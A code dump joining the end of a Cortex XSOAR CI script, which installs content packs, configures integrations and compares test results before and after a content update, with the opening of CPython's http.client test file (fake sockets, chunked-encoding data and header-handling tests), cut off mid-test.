logging.debug('Request to install content was unsuccessful, sleeping for 30 seconds and retrying')
sleep(30)
else:
# check that the content installation updated
# verify the asset id matches the circleci build number / asset_id in the content-descriptor.json
release, asset_id = get_content_version_details(client, ami_name)
logging.info(f'Content Release Version: {release}')
with open('./artifacts/content-descriptor.json', 'r') as cd_file:
cd_json = json.loads(cd_file.read())
cd_release = cd_json.get('release')
cd_asset_id = cd_json.get('assetId')
if release == cd_release and asset_id == cd_asset_id:
logging.success(f'Content Update Successfully Installed on server {server}.')
else:
logging.error(
f'Content Update to version: {release} was Unsuccessful:\nAttempted to install content with release '
f'"{cd_release}" and assetId "{cd_asset_id}" but release "{release}" and assetId "{asset_id}" '
f'were retrieved from the instance post installation.')
if ami_name not in MARKET_PLACE_MACHINES:
os._exit(1)
def report_tests_status(preupdate_fails, postupdate_fails, preupdate_success, postupdate_success,
new_integrations_names, build=None):
"""Prints errors and/or warnings if there are any and returns whether whether testing was successful or not.
Args:
preupdate_fails (set): List of tuples of integrations that failed the "Test" button prior to content
being updated on the demisto instance where each tuple is comprised of the integration name and the
name of the instance that was configured for that integration which failed.
postupdate_fails (set): List of tuples of integrations that failed the "Test" button after content was
updated on the demisto instance where each tuple is comprised of the integration name and the name
of the instance that was configured for that integration which failed.
preupdate_success (set): List of tuples of integrations that succeeded the "Test" button prior to content
being updated on the demisto instance where each tuple is comprised of the integration name and the
name of the instance that was configured for that integration which failed.
postupdate_success (set): List of tuples of integrations that succeeded the "Test" button after content was
updated on the demisto instance where each tuple is comprised of the integration name and the name
of the instance that was configured for that integration which failed.
new_integrations_names (list): List of the names of integrations that are new since the last official
content release and that will only be present on the demisto instance after the content update is
performed.
build: Build object
Returns:
(bool): False if there were integration instances that succeeded prior to the content update and then
failed after content was updated, otherwise True.
"""
testing_status = True
# a "Test" can be either successful both before and after content update(succeeded_pre_and_post variable),
# fail on one of them(mismatched_statuses variable), or on both(failed_pre_and_post variable)
succeeded_pre_and_post = preupdate_success.intersection(postupdate_success)
if succeeded_pre_and_post:
succeeded_pre_and_post_string = "\n".join(
[f'Integration: "{integration_of_instance}", Instance: "{instance_name}"' for
instance_name, integration_of_instance in succeeded_pre_and_post])
logging.success(
'Integration instances that had ("Test" Button) succeeded both before and after the content update:\n'
f'{succeeded_pre_and_post_string}')
failed_pre_and_post = preupdate_fails.intersection(postupdate_fails)
mismatched_statuses = postupdate_fails - preupdate_fails
failed_only_after_update = []
failed_but_is_new = []
for instance_name, integration_of_instance in mismatched_statuses:
if integration_of_instance in new_integrations_names:
failed_but_is_new.append((instance_name, integration_of_instance))
else:
failed_only_after_update.append((instance_name, integration_of_instance))
# warnings but won't fail the build step
if failed_but_is_new:
failed_but_is_new_string = "\n".join(
[f'Integration: "{integration_of_instance}", Instance: "{instance_name}"'
for instance_name, integration_of_instance in failed_but_is_new])
logging.warning(f'New Integrations ("Test" Button) Failures:\n{failed_but_is_new_string}')
if failed_pre_and_post:
failed_pre_and_post_string = "\n".join(
[f'Integration: "{integration_of_instance}", Instance: "{instance_name}"'
for instance_name, integration_of_instance in failed_pre_and_post])
logging.warning(f'Integration instances that had ("Test" Button) failures '
f'both before and after the content update:\n{pformat(failed_pre_and_post_string)}')
# fail the step if there are instances that only failed after content was updated
if failed_only_after_update:
failed_only_after_update_string = "\n".join(
[f'Integration: "{integration_of_instance}", Instance: "{instance_name}"' for
instance_name, integration_of_instance in failed_only_after_update])
testing_status = False
logging.critical('Integration instances that had ("Test" Button) failures only after content was updated:\n'
f'{pformat(failed_only_after_update_string)}.\n'
f'This indicates that your updates introduced breaking changes to the integration.')
else:
# creating this file to indicates that this instance passed post update tests
if build:
with open("./Tests/is_post_update_passed_{}.txt".format(build.ami_env.replace(' ', '')), 'a'):
pass
return testing_status
def get_env_conf():
if Build.run_environment == Running.CI_RUN:
return get_json_file(Build.env_results_path)
elif Build.run_environment == Running.WITH_LOCAL_SERVER:
# START CHANGE ON LOCAL RUN #
return [{
"InstanceDNS": "http://localhost:8080",
"Role": "Server Master" # e.g. 'Server Master'
}]
elif Build.run_environment == Running.WITH_OTHER_SERVER:
return [{
"InstanceDNS": "DNS NANE", # without http prefix
"Role": "DEMISTO EVN" # e.g. 'Server Master'
}]
# END CHANGE ON LOCAL RUN #
return None
def map_server_to_port(env_results, instance_role):
"""
Arguments:
env_results: (dict)
env_results.json in server
instance_role: (str)
The amazon machine image environment whose IP we should connect to.
Returns:
(lst): The server url list to connect to
"""
ip_to_port_map = {env.get('InstanceDNS'): env.get('TunnelPort') for env in env_results if
instance_role in env.get('Role', '')}
return ip_to_port_map
def get_json_file(path):
with open(path, 'r') as json_file:
return json.loads(json_file.read())
def configure_servers_and_restart(build):
manual_restart = Build.run_environment == Running.WITH_LOCAL_SERVER
for server in build.servers:
configurations = dict()
configure_types = []
if is_redhat_instance(server.internal_ip):
configurations.update(DOCKER_HARDENING_CONFIGURATION_FOR_PODMAN)
configurations.update(NO_PROXY_CONFIG)
configurations['python.pass.extra.keys'] += "##--network=slirp4netns:cidr=192.168.0.0/16"
else:
configurations.update(DOCKER_HARDENING_CONFIGURATION)
configure_types.append('docker hardening')
configure_types.append('marketplace')
configurations.update(MARKET_PLACE_CONFIGURATION)
error_msg = 'failed to set {} configurations'.format(' and '.join(configure_types))
server.add_server_configuration(configurations, error_msg=error_msg, restart=not manual_restart)
if manual_restart:
input('restart your server and then press enter.')
else:
logging.info('Done restarting servers. Sleeping for 1 minute')
sleep(60)
def get_tests(build: Build) -> List[dict]:
"""
Selects the tests from that should be run in this execution and filters those that cannot run in this server version
Args:
build: Build object
Returns:
Test configurations from conf.json that should be run in this execution
"""
server_numeric_version: str = build.server_numeric_version
tests: dict = build.tests
if Build.run_environment == Running.CI_RUN:
filtered_tests = extract_filtered_tests()
if build.is_nightly:
# skip test button testing
logging.debug('Not running instance tests in nightly flow')
tests_for_iteration = []
else:
tests_for_iteration = [test for test in tests
if not filtered_tests or test.get('playbookID', '') in filtered_tests]
tests_for_iteration = filter_tests_with_incompatible_version(tests_for_iteration, server_numeric_version)
return tests_for_iteration
else:
# START CHANGE ON LOCAL RUN #
return [
{
"playbookID": "Docker Hardening Test",
"fromversion": "5.0.0"
},
{
"integrations": "SplunkPy",
"playbookID": "SplunkPy-Test-V2",
"memory_threshold": 500,
"instance_names": "use_default_handler"
}
]
# END CHANGE ON LOCAL RUN #
def get_changed_integrations(build: Build) -> tuple:
"""
Return 2 lists - list of new integrations and list of modified integrations since the commit of the git_sha1.
Args:
build: the build object
Returns:
list of new integrations and list of modified integrations
"""
new_integrations_files, modified_integrations_files = get_new_and_modified_integration_files(
build.branch_name) if not build.is_private else ([], [])
new_integrations_names, modified_integrations_names = [], []
if new_integrations_files:
new_integrations_names = get_integration_names_from_files(new_integrations_files)
logging.debug(f'New Integrations Since Last Release:\n{new_integrations_names}')
if modified_integrations_files:
modified_integrations_names = get_integration_names_from_files(modified_integrations_files)
logging.debug(f'Updated Integrations Since Last Release:\n{modified_integrations_names}')
return new_integrations_names, modified_integrations_names
def get_pack_ids_to_install():
if Build.run_environment == Running.CI_RUN:
with open('./artifacts/content_packs_to_install.txt', 'r') as packs_stream:
pack_ids = packs_stream.readlines()
return [pack_id.rstrip('\n') for pack_id in pack_ids]
else:
# START CHANGE ON LOCAL RUN #
return [
'SplunkPy'
]
# END CHANGE ON LOCAL RUN #
def nightly_install_packs(build, install_method=None, pack_path=None, service_account=None):
threads_list = []
if not install_method:
raise Exception('Install method was not provided.')
# For each server url we install pack/ packs
for thread_index, server in enumerate(build.servers):
kwargs = {'client': server.client, 'host': server.internal_ip}
if service_account:
kwargs['service_account'] = service_account
if pack_path:
kwargs['pack_path'] = pack_path
threads_list.append(Thread(target=install_method, kwargs=kwargs))
run_threads_list(threads_list)
def install_nightly_pack(build):
nightly_install_packs(build, install_method=install_all_content_packs_for_nightly,
service_account=build.service_account)
create_nightly_test_pack()
nightly_install_packs(build, install_method=upload_zipped_packs,
pack_path=f'{Build.test_pack_target}/test_pack.zip')
logging.info('Sleeping for 45 seconds while installing nightly packs')
sleep(45)
def install_packs(build, pack_ids=None):
pack_ids = get_pack_ids_to_install() if pack_ids is None else pack_ids
installed_content_packs_successfully = True
for server in build.servers:
try:
_, flag = search_and_install_packs_and_their_dependencies(pack_ids, server.client)
if not flag:
raise Exception('Failed to search and install packs.')
except Exception:
logging.exception('Failed to search and install packs')
installed_content_packs_successfully = False
return installed_content_packs_successfully
def configure_server_instances(build: Build, tests_for_iteration, all_new_integrations, modified_integrations):
modified_module_instances = []
new_module_instances = []
testing_client = build.servers[0].client
for test in tests_for_iteration:
integrations = get_integrations_for_test(test, build.skipped_integrations_conf)
playbook_id = test.get('playbookID')
new_integrations, modified_integrations, unchanged_integrations, integration_to_status = group_integrations(
integrations, build.skipped_integrations_conf, all_new_integrations, modified_integrations
)
integration_to_status_string = '\n\t\t\t\t\t\t'.join(
[f'"{key}" - {val}' for key, val in integration_to_status.items()])
if integration_to_status_string:
logging.info(f'All Integrations for test "{playbook_id}":\n\t\t\t\t\t\t{integration_to_status_string}')
else:
logging.info(f'No Integrations for test "{playbook_id}"')
instance_names_conf = test.get('instance_names', [])
if not isinstance(instance_names_conf, list):
instance_names_conf = [instance_names_conf]
integrations_to_configure = modified_integrations[:]
integrations_to_configure.extend(unchanged_integrations)
placeholders_map = {'%%SERVER_HOST%%': build.servers[0]}
new_ints_params_set = set_integration_params(build,
new_integrations,
build.secret_conf['integrations'],
instance_names_conf,
placeholders_map)
ints_to_configure_params_set = set_integration_params(build,
integrations_to_configure,
build.secret_conf['integrations'],
instance_names_conf, placeholders_map)
if not new_ints_params_set:
logging.error(f'failed setting parameters for integrations: {new_integrations}')
if not ints_to_configure_params_set:
logging.error(f'failed setting parameters for integrations: {integrations_to_configure}')
if not (new_ints_params_set and ints_to_configure_params_set):
continue
modified_module_instances_for_test, new_module_instances_for_test = configure_modified_and_new_integrations(
build,
integrations_to_configure,
new_integrations,
testing_client)
modified_module_instances.extend(modified_module_instances_for_test)
new_module_instances.extend(new_module_instances_for_test)
return modified_module_instances, new_module_instances
def configure_modified_and_new_integrations(build: Build,
modified_integrations_to_configure: list,
new_integrations_to_configure: list,
demisto_client: demisto_client) -> tuple:
"""
Configures old and new integrations in the server configured in the demisto_client.
Args:
build: The build object
modified_integrations_to_configure: Integrations to configure that are already exists
new_integrations_to_configure: Integrations to configure that were created in this build
demisto_client: A demisto client
Returns:
A tuple with two lists:
1. List of configured instances of modified integrations
2. List of configured instances of new integrations
"""
modified_modules_instances = []
new_modules_instances = []
for integration in modified_integrations_to_configure:
placeholders_map = {'%%SERVER_HOST%%': build.servers[0]}
module_instance = configure_integration_instance(integration, demisto_client, placeholders_map)
if module_instance:
modified_modules_instances.append(module_instance)
for integration in new_integrations_to_configure:
placeholders_map = {'%%SERVER_HOST%%': build.servers[0]}
module_instance = configure_integration_instance(integration, demisto_client, placeholders_map)
if module_instance:
new_modules_instances.append(module_instance)
return modified_modules_instances, new_modules_instances
def instance_testing(build: Build,
all_module_instances: list,
pre_update: bool,
use_mock: bool = True,
first_call: bool = True) -> Tuple[set, set]:
"""
Runs 'test-module' command for the instances detailed in `all_module_instances`
Args:
build: An object containing the current build info.
all_module_instances: The integration instances that should be tested
pre_update: Whether this instance testing is before or after the content update on the server.
use_mock: Whether to use mock while testing mockable integrations. Should be used mainly with
private content build which aren't using the mocks.
first_call: indicates if its the first time the function is called from the same place
Returns:
A set of the successful tests containing the instance name and the integration name
A set of the failed tests containing the instance name and the integration name
"""
update_status = 'Pre' if pre_update else 'Post'
failed_tests = set()
successful_tests = set()
# Test all module instances (of modified + unchanged integrations) pre-updating content
if all_module_instances:
# only print start message if there are instances to configure
logging.info(f'Start of Instance Testing ("Test" button) ({update_status}-update)')
else:
logging.info(f'No integrations to configure for the chosen tests. ({update_status}-update)')
failed_instances = []
for instance in all_module_instances:
integration_of_instance = instance.get('brand', '')
instance_name = instance.get('name', '')
# If there is a failure, __test_integration_instance will print it
if integration_of_instance not in build.unmockable_integrations and use_mock:
success = test_integration_with_mock(build, instance, pre_update)
else:
testing_client = build.servers[0].reconnect_client()
success, _ = __test_integration_instance(testing_client, instance)
if not success:
failed_tests.add((instance_name, integration_of_instance))
failed_instances.append(instance)
else:
successful_tests.add((instance_name, integration_of_instance))
# in case some tests failed post update, wait a 15 secs, runs the tests again
if failed_instances and not pre_update and first_call:
logging.info("some post-update tests failed, sleeping for 15 seconds, then running the failed tests again")
sleep(15)
succeeded, failed_tests = instance_testing(build, failed_instances, pre_update=False, first_call=False)
return successful_tests, failed_tests
def test_integration_with_mock(build: Build, instance: dict, pre_update: bool):
"""
Runs 'test-module' for given integration with mitmproxy
In case the playback mode fails and this is a pre-update run - a record attempt will be executed.
Args:
build: An object containing the current build info.
instance: A dict containing the instance details
pre_update: Whether this instance testing is before or after the content update on the server.
Returns:
The result of running the 'test-module' command for the given integration.
If a record was executed - will return the result of the 'test--module' with the record mode only.
"""
testing_client = build.servers[0].reconnect_client()
integration_of_instance = instance.get('brand', '')
logging.debug(f'Integration "{integration_of_instance}" is mockable, running test-module with mitmproxy')
has_mock_file = build.proxy.has_mock_file(integration_of_instance)
success = False
if has_mock_file:
with run_with_mock(build.proxy, integration_of_instance) as result_holder:
success, _ = __test_integration_instance(testing_client, instance)
result_holder[RESULT] = success
if not success:
logging.warning(f'Running test-module for "{integration_of_instance}" has failed in playback mode')
if not success and not pre_update:
logging.debug(f'Recording a mock file for integration "{integration_of_instance}".')
with run_with_mock(build.proxy, integration_of_instance, record=True) as result_holder:
success, _ = __test_integration_instance(testing_client, instance)
result_holder[RESULT] = success
if not success:
logging.debug(f'Record mode for integration "{integration_of_instance}" has failed.')
return success
def update_content_till_v6(build: Build):
threads_list = []
# For each server url we install content
for thread_index, server in enumerate(build.servers):
t = Thread(target=update_content_on_demisto_instance,
kwargs={'client': server.client, 'server': server.internal_ip, 'ami_name': build.ami_env})
threads_list.append(t)
run_threads_list(threads_list)
def disable_instances(build: Build):
for server in build.servers:
disable_all_integrations(server.client)
def create_nightly_test_pack():
test_pack_zip(Build.content_path, Build.test_pack_target)
def test_files(content_path):
packs_root = f'{content_path}/Packs'
packs = filter(lambda x: x.is_dir(), os.scandir(packs_root))
for pack_dir in packs:
if pack_dir in SKIPPED_PACKS:
continue
playbooks_root = f'{pack_dir.path}/TestPlaybooks'
if os.path.isdir(playbooks_root):
for playbook_path, playbook in get_test_playbooks_in_dir(playbooks_root):
yield playbook_path, playbook
if os.path.isdir(f'{playbooks_root}/NonCircleTests'):
for playbook_path, playbook in get_test_playbooks_in_dir(f'{playbooks_root}/NonCircleTests'):
yield playbook_path, playbook
def get_test_playbooks_in_dir(path):
playbooks = filter(lambda x: x.is_file(), os.scandir(path))
for playbook in playbooks:
yield playbook.path, playbook
def test_pack_metadata():
now = datetime.now().isoformat().split('.')[0]
now = f'{now}Z'
metadata = {
"name": "nightly test",
"id": str(uuid.uuid4()),
"description": "nightly test pack (all test playbooks and scripts).",
"created": now,
"updated": now,
"legacy": True,
"support": "Cortex XSOAR",
"supportDetails": {},
"author": "Cortex XSOAR",
"authorImage": "",
"certification": "certified",
"price": 0,
"serverMinVersion": "6.0.0",
"serverLicense": "",
"currentVersion": "1.0.0",
"general": [],
"tags": [],
"categories": [
"Forensics & Malware Analysis"
],
"contentItems": {},
"integrations": [],
"useCases": [],
"keywords": [],
"dependencies": {}
}
return json.dumps(metadata, indent=4)
def test_pack_zip(content_path, target):
with zipfile.ZipFile(f'{target}/test_pack.zip', 'w', zipfile.ZIP_DEFLATED) as zip_file:
zip_file.writestr('test_pack/metadata.json', test_pack_metadata())
for test_path, test in test_files(content_path):
if not test_path.endswith('.yml'):
continue
test = test.name
with open(test_path, 'r') as test_file:
if not (test.startswith('playbook-') or test.startswith('script-')):
test_type = find_type(_dict=yaml.safe_load(test_file), file_type='yml').value
test_file.seek(0)
test_target = f'test_pack/TestPlaybooks/{test_type}-{test}'
else:
test_target = f'test_pack/TestPlaybooks/{test}'
zip_file.writestr(test_target, test_file.read())
def get_non_added_packs_ids(build: Build):
"""
:param build: the build object
:return: all non added packs i.e. unchanged packs (dependencies) and modified packs
"""
compare_against = 'origin/master{}'.format('' if not build.branch_name == 'master' else '~1')
added_files = run_command(f'git diff --name-only --diff-filter=A '
f'{compare_against}..refs/heads/{build.branch_name} -- Packs/*/pack_metadata.json')
if os.getenv('CONTRIB_BRANCH'):
added_contrib_files = run_command(
'git status -uall --porcelain -- Packs/*/pack_metadata.json | grep "?? "').replace('?? ', '')
added_files = added_files if not added_contrib_files else '\n'.join([added_files, added_contrib_files])
added_files = filter(lambda x: x, added_files.split('\n'))
added_pack_ids = map(lambda x: x.split('/')[1], added_files)
return set(get_pack_ids_to_install()) - set(added_pack_ids)
def set_marketplace_url(servers, branch_name, ci_build_number):
url_suffix = quote_plus(f'{branch_name}/{ci_build_number}')
config_path = 'marketplace.bootstrap.bypass.url'
config = {config_path: f'https://storage.googleapis.com/marketplace-ci-build/content/builds/{url_suffix}'}
for server in servers:
server.add_server_configuration(config, 'failed to configure marketplace custom url ', True)
logging.success('Updated marketplace url and restarted servers')
logging.info('sleeping for 60 seconds')
sleep(60)
@run_with_proxy_configured
def test_integrations_post_update(build: Build, new_module_instances: list, modified_module_instances: list) -> tuple:
"""
Runs 'test-module on all integrations for post-update check
Args:
build: A build object
new_module_instances: A list containing new integrations instances to run test-module on
modified_module_instances: A list containing old (existing) integrations instances to run test-module on
Returns:
* A list of integration names that have failed the 'test-module' execution post update
* A list of integration names that have succeeded the 'test-module' execution post update
"""
modified_module_instances.extend(new_module_instances)
successful_tests_post, failed_tests_post = instance_testing(build, modified_module_instances, pre_update=False)
return successful_tests_post, failed_tests_post
def update_content_on_servers(build: Build) -> bool:
"""
Updates content on the build's server according to the server version
Args:
build: Build object
Returns:
A boolean that indicates whether the content installation was successful.
If the server version is lower then 5.9.9 will return the 'installed_content_packs_successfully' parameter as is
If the server version is higher or equal to 6.0 - will return True if the packs installation was successful
both before that update and after the update.
"""
installed_content_packs_successfully = True
if LooseVersion(build.server_numeric_version) < LooseVersion('6.0.0'):
update_content_till_v6(build)
elif not build.is_nightly:
set_marketplace_url(build.servers, build.branch_name, build.ci_build_number)
installed_content_packs_successfully = install_packs(build)
return installed_content_packs_successfully
@run_with_proxy_configured
def configure_and_test_integrations_pre_update(build: Build, new_integrations, modified_integrations) -> tuple:
"""
Configures integration instances that exist in the current version and for each integration runs 'test-module'.
Args:
build: Build object
new_integrations: A list containing new integrations names
modified_integrations: A list containing modified integrations names
Returns:
A tuple consists of:
* A list of modified module instances configured
* A list of new module instances configured
* A list of integrations that have failed the 'test-module' command execution
* A list of integrations that have succeeded the 'test-module' command execution
* A list of new integrations names
"""
tests_for_iteration = get_tests(build)
modified_module_instances, new_module_instances = configure_server_instances(build,
tests_for_iteration,
new_integrations,
modified_integrations)
successful_tests_pre, failed_tests_pre = instance_testing(build, modified_module_instances, pre_update=True)
return modified_module_instances, new_module_instances, failed_tests_pre, successful_tests_pre
def install_packs_pre_update(build: Build) -> bool:
"""
Install packs on server according to server version
Args:
build: A build object
Returns:
A boolean that indicates whether the installation was successful or not
"""
installed_content_packs_successfully = False
if LooseVersion(build.server_numeric_version) >= LooseVersion('6.0.0'):
if build.is_nightly:
install_nightly_pack(build)
installed_content_packs_successfully = True
else:
if not build.is_private:
pack_ids = get_non_added_packs_ids(build)
installed_content_packs_successfully = install_packs(build, pack_ids=pack_ids)
else:
installed_content_packs_successfully = True
return installed_content_packs_successfully
def main():
install_logging('Install_Content_And_Configure_Integrations_On_Server.log', logger=logging)
build = Build(options_handler())
logging.info(f"Build Number: {build.ci_build_number}")
configure_servers_and_restart(build)
disable_instances(build)
install_packs_pre_update(build)
new_integrations, modified_integrations = get_changed_integrations(build)
pre_update_configuration_results = configure_and_test_integrations_pre_update(build,
new_integrations,
modified_integrations)
modified_module_instances, new_module_instances, failed_tests_pre, successful_tests_pre = pre_update_configuration_results
installed_content_packs_successfully = update_content_on_servers(build)
successful_tests_post, failed_tests_post = test_integrations_post_update(build,
new_module_instances,
modified_module_instances)
success = report_tests_status(failed_tests_pre, failed_tests_post, successful_tests_pre, successful_tests_post,
new_integrations, build)
if not success or not installed_content_packs_successfully:
sys.exit(2)
if __name__ == '__main__':
main()
|
test_httplib.py
|
import errno
from http import client
import io
import itertools
import os
import array
import re
import socket
import threading
import unittest
TestCase = unittest.TestCase
from test import support
here = os.path.dirname(__file__)
# Self-signed cert file for 'localhost'
CERT_localhost = os.path.join(here, 'keycert.pem')
# Self-signed cert file for 'fakehostname'
CERT_fakehostname = os.path.join(here, 'keycert2.pem')
# Self-signed cert file for self-signed.pythontest.net
CERT_selfsigned_pythontestdotnet = os.path.join(here, 'selfsigned_pythontestdotnet.pem')
# constants for testing chunked encoding
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd! \r\n'
'8\r\n'
'and now \r\n'
'22\r\n'
'for something completely different\r\n'
)
chunked_expected = b'hello world! and now for something completely different'
chunk_extension = ";foo=bar"
last_chunk = "0\r\n"
last_chunk_extended = "0" + chunk_extension + "\r\n"
trailers = "X-Dummy: foo\r\nX-Dumm2: bar\r\n"
chunked_end = "\r\n"
HOST = support.HOST
class FakeSocket:
def __init__(self, text, fileclass=io.BytesIO, host=None, port=None):
if isinstance(text, str):
text = text.encode("ascii")
self.text = text
self.fileclass = fileclass
self.data = b''
self.sendall_calls = 0
self.file_closed = False
self.host = host
self.port = port
def sendall(self, data):
self.sendall_calls += 1
self.data += data
def makefile(self, mode, bufsize=None):
if mode != 'r' and mode != 'rb':
raise client.UnimplementedFileMode()
# keep the file around so we can check how much was read from it
self.file = self.fileclass(self.text)
self.file.close = self.file_close #nerf close ()
return self.file
def file_close(self):
self.file_closed = True
def close(self):
pass
def setsockopt(self, level, optname, value):
pass
class EPipeSocket(FakeSocket):
def __init__(self, text, pipe_trigger):
# When sendall() is called with pipe_trigger, raise EPIPE.
FakeSocket.__init__(self, text)
self.pipe_trigger = pipe_trigger
def sendall(self, data):
if self.pipe_trigger in data:
raise OSError(errno.EPIPE, "gotcha")
self.data += data
def close(self):
pass
class NoEOFBytesIO(io.BytesIO):
"""Like BytesIO, but raises AssertionError on EOF.
This is used below to test that http.client doesn't try to read
more from the underlying file than it should.
"""
def read(self, n=-1):
data = io.BytesIO.read(self, n)
if data == b'':
raise AssertionError('caller tried to read past EOF')
return data
def readline(self, length=None):
data = io.BytesIO.readline(self, length)
if data == b'':
raise AssertionError('caller tried to read past EOF')
return data
class FakeSocketHTTPConnection(client.HTTPConnection):
"""HTTPConnection subclass using FakeSocket; counts connect() calls"""
def __init__(self, *args):
self.connections = 0
super().__init__('example.com')
self.fake_socket_args = args
self._create_connection = self.create_connection
def connect(self):
"""Count the number of times connect() is invoked"""
self.connections += 1
return super().connect()
def create_connection(self, *pos, **kw):
return FakeSocket(*self.fake_socket_args)
class HeaderTests(TestCase):
def test_auto_headers(self):
# Some headers are added automatically, but should not be added by
# .request() if they are explicitly set.
class HeaderCountingBuffer(list):
def __init__(self):
self.count = {}
def append(self, item):
kv = item.split(b':')
if len(kv) > 1:
# item is a 'Key: Value' header string
lcKey = kv[0].decode('ascii').lower()
self.count.setdefault(lcKey, 0)
self.count[lcKey] += 1
list.append(self, item)
for explicit_header in True, False:
for header in 'Content-length', 'Host', 'Accept-encoding':
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('blahblahblah')
conn._buffer = HeaderCountingBuffer()
body = 'spamspamspam'
headers = {}
if explicit_header:
headers[header] = str(len(body))
conn.request('POST', '/', body, headers)
self.assertEqual(conn._buffer.count[header.lower()], 1)
def test_content_length_0(self):
class ContentLengthChecker(list):
def __init__(self):
list.__init__(self)
self.content_length = None
def append(self, item):
kv = item.split(b':', 1)
if len(kv) > 1 and kv[0].lower() == b'content-length':
self.content_length = kv[1].strip()
list.append(self, item)
# Here, we're testing that methods expecting a body get a
# content-length set to zero if the body is empty (either None or '')
bodies = (None, '')
methods_with_body = ('PUT', 'POST', 'PATCH')
for method, body in itertools.product(methods_with_body, bodies):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', body)
self.assertEqual(
conn._buffer.content_length, b'0',
'Header Content-Length incorrect on {}'.format(method)
)
# For these methods, we make sure that content-length is not set when
# the body is None because it might cause unexpected behaviour on the
# server.
methods_without_body = (
'GET', 'CONNECT', 'DELETE', 'HEAD', 'OPTIONS', 'TRACE',
)
for method in methods_without_body:
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', None)
self.assertEqual(
conn._buffer.content_length, None,
'Header Content-Length set for empty body on {}'.format(method)
)
# If the body is set to '', that's considered to be "present but
# empty" rather than "missing", so content length would be set, even
# for methods that don't expect a body.
for method in methods_without_body:
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', '')
self.assertEqual(
conn._buffer.content_length, b'0',
'Header Content-Length incorrect on {}'.format(method)
)
# If the body is set, make sure Content-Length is set.
for method in itertools.chain(methods_without_body, methods_with_body):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', ' ')
self.assertEqual(
conn._buffer.content_length, b'1',
'Header Content-Length incorrect on {}'.format(method)
)
def test_putheader(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn.putrequest('GET','/')
conn.putheader('Content-length', 42)
self.assertIn(b'Content-length: 42', conn._buffer)
conn.putheader('Foo', ' bar ')
self.assertIn(b'Foo: bar ', conn._buffer)
conn.putheader('Bar', '\tbaz\t')
self.assertIn(b'Bar: \tbaz\t', conn._buffer)
conn.putheader('Authorization', 'Bearer mytoken')
self.assertIn(b'Authorization: Bearer mytoken', conn._buffer)
conn.putheader('IterHeader', 'IterA', 'IterB')
self.assertIn(b'IterHeader: IterA\r\n\tIterB', conn._buffer)
conn.putheader('LatinHeader', b'\xFF')
self.assertIn(b'LatinHeader: \xFF', conn._buffer)
conn.putheader('Utf8Header', b'\xc3\x80')
self.assertIn(b'Utf8Header: \xc3\x80', conn._buffer)
conn.putheader('C1-Control', b'next\x85line')
self.assertIn(b'C1-Control: next\x85line', conn._buffer)
conn.putheader('Embedded-Fold-Space', 'is\r\n allowed')
self.assertIn(b'Embedded-Fold-Space: is\r\n allowed', conn._buffer)
conn.putheader('Embedded-Fold-Tab', 'is\r\n\tallowed')
self.assertIn(b'Embedded-Fold-Tab: is\r\n\tallowed', conn._buffer)
conn.putheader('Key Space', 'value')
self.assertIn(b'Key Space: value', conn._buffer)
conn.putheader('KeySpace ', 'value')
self.assertIn(b'KeySpace : value', conn._buffer)
conn.putheader(b'Nonbreak\xa0Space', 'value')
self.assertIn(b'Nonbreak\xa0Space: value', conn._buffer)
conn.putheader(b'\xa0NonbreakSpace', 'value')
self.assertIn(b'\xa0NonbreakSpace: value', conn._buffer)
def test_ipv6host_header(self):
# Default host header on IPv6 transaction should be wrapped by [] if
# it is an IPv6 address
expected = b'GET /foo HTTP/1.1\r\nHost: [2001::]:81\r\n' \
b'Accept-Encoding: identity\r\n\r\n'
conn = client.HTTPConnection('[2001::]:81')
sock = FakeSocket('')
conn.sock = sock
conn.request('GET', '/foo')
self.assertTrue(sock.data.startswith(expected))
expected = b'GET /foo HTTP/1.1\r\nHost: [2001:102A::]\r\n' \
b'Accept-Encoding: identity\r\n\r\n'
conn = client.HTTPConnection('[2001:102A::]')
sock = FakeSocket('')
conn.sock = sock
conn.request('GET', '/foo')
self.assertTrue(sock.data.startswith(expected))
def test_malformed_headers_coped_with(self):
# Issue 19996
body = "HTTP/1.1 200 OK\r\nFirst: val\r\n: nval\r\nSecond: val\r\n\r\n"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.getheader('First'), 'val')
self.assertEqual(resp.getheader('Second'), 'val')
def test_parse_all_octets(self):
# Ensure no valid header field octet breaks the parser
body = (
b'HTTP/1.1 200 OK\r\n'
b"!#$%&'*+-.^_`|~: value\r\n" # Special token characters
b'VCHAR: ' + bytes(range(0x21, 0x7E + 1)) + b'\r\n'
b'obs-text: ' + bytes(range(0x80, 0xFF + 1)) + b'\r\n'
b'obs-fold: text\r\n'
b' folded with space\r\n'
b'\tfolded with tab\r\n'
b'Content-Length: 0\r\n'
b'\r\n'
)
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.getheader('Content-Length'), '0')
self.assertEqual(resp.msg['Content-Length'], '0')
self.assertEqual(resp.getheader("!#$%&'*+-.^_`|~"), 'value')
self.assertEqual(resp.msg["!#$%&'*+-.^_`|~"], 'value')
vchar = ''.join(map(chr, range(0x21, 0x7E + 1)))
self.assertEqual(resp.getheader('VCHAR'), vchar)
self.assertEqual(resp.msg['VCHAR'], vchar)
self.assertIsNotNone(resp.getheader('obs-text'))
self.assertIn('obs-text', resp.msg)
for folded in (resp.getheader('obs-fold'), resp.msg['obs-fold']):
self.assertTrue(folded.startswith('text'))
self.assertIn(' folded with space', folded)
self.assertTrue(folded.endswith('folded with tab'))
def test_invalid_headers(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/')
# http://tools.ietf.org/html/rfc7230#section-3.2.4, whitespace is no
# longer allowed in header names
cases = (
(b'Invalid\r\nName', b'ValidValue'),
(b'Invalid\rName', b'ValidValue'),
(b'Invalid\nName', b'ValidValue'),
